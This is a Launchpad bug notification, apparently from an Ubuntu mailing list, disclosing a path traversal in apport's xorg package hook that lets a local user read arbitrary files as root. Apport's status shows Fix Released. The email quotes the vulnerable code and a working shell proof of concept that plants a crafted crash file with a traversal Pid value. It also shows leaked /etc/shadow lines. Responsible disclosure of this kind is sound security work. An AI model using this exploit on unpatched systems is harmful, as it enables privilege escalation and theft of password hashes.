** Changed in: openjdk-13 (Ubuntu)
Status: New => Won't Fix
** Changed in: openjdk-14 (Ubuntu)
Status: New => Won't Fix
** Changed in: openjdk-15 (Ubuntu)
Status: New => Won't Fix
** Changed in: openjdk-16 (Ubuntu)
Status: New => Won't Fix
** Changed in: openjdk-17 (Ubuntu)
Status: New => Won't Fix
** Changed in: openjdk-18 (Ubuntu)
Status: New => Won't Fix
** Changed in: openjdk-8 (Ubuntu)
Status: New => Won't Fix
** Changed in: xorg (Ubuntu)
Status: New => Won't Fix
--
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to apport in Ubuntu.
https://bugs.launchpad.net/bugs/1933832
Title:
Path traversal leads to arbitrary file read
Status in apport package in Ubuntu:
Fix Released
Status in openjdk-13 package in Ubuntu:
Won't Fix
Status in openjdk-14 package in Ubuntu:
Won't Fix
Status in openjdk-15 package in Ubuntu:
Won't Fix
Status in openjdk-16 package in Ubuntu:
Won't Fix
Status in openjdk-17 package in Ubuntu:
Won't Fix
Status in openjdk-18 package in Ubuntu:
Won't Fix
Status in openjdk-8 package in Ubuntu:
Won't Fix
Status in xorg package in Ubuntu:
Won't Fix
Bug description:
While reiterating the issues reported in
https://bugs.launchpad.net/bugs/1917904, Stephen Röttger (@_tsuro)
mentioned, that the second issue "Arbitrary file read in package-
hooks/source_xorg.py (Info)" might additionally contain a path
traversal vulnerability. This was confirmed by developing a PoC, that
enables a user to read arbitrary files in the context of the root
user, leading to elevation of privileges. Exploiting this issue
requires, that automatic crash reporting is enabled.
The following excerpt of the file `package-hooks/source_xorg.py` shows the
vulnerable code:
if True or report.get('SourcePackage','Unknown') == "compiz" and "ProcStatus"
in report:
compiz_pid = 0
pid_line = re.search("Pid:\t(.*)\n", report["ProcStatus"]) # [0]
if pid_line:
compiz_pid = pid_line.groups()[0]
compiz_state_file = '/tmp/compiz_internal_state%s' % compiz_pid # [1]
attach_file_if_exists(report, compiz_state_file, "compiz_internal_states")
While in [0] the `pid_line` is extracted, this value (if successfully
matched) is appended to the file path resulting in `compiz_state_file` [1],
which is subsequently attached to the crash file.
Using a `Pid` such as `JRN/../../../../etc/shadow` therefore results in the
file `/etc/shadow` being attached (after creating the directory
`/tmp/compiz_internal_stateJRN`).
The following POC (tested on 20.04/21.04 Desktop) exploits this issue
to read the file `/etc/shadow`:
mkdir /tmp/compiz_internal_stateJRN/;pid=$'\tJRN/../../../etc/shadow';cat <<
EOF > /var/crash/poc.crash
ProblemType: Crash
ExecutablePath: /poc
Package: source_xorg 123
SourcePackage: compiz
ProcStatus:
Pid:$pid
Uid:$pid
EOF
When reading the crash file (after `whoopsie-upload-all` ran), the contents
of the file `/etc/shadow` are indeed attached:
grep -A3 compiz_internal /var/crash/poc.crash
compiz_internal_states:
root:!:18393:0:99999:7:::
daemon:*:18375:0:99999:7:::
bin:*:18375:0:99999:7:::
Please credit Stephen Röttger (@_tsuro) in a potential CVE/USN.
Best regards,
Maik
To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/apport/+bug/1933832/+subscriptions
--
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help : https://help.launchpad.net/ListHelp
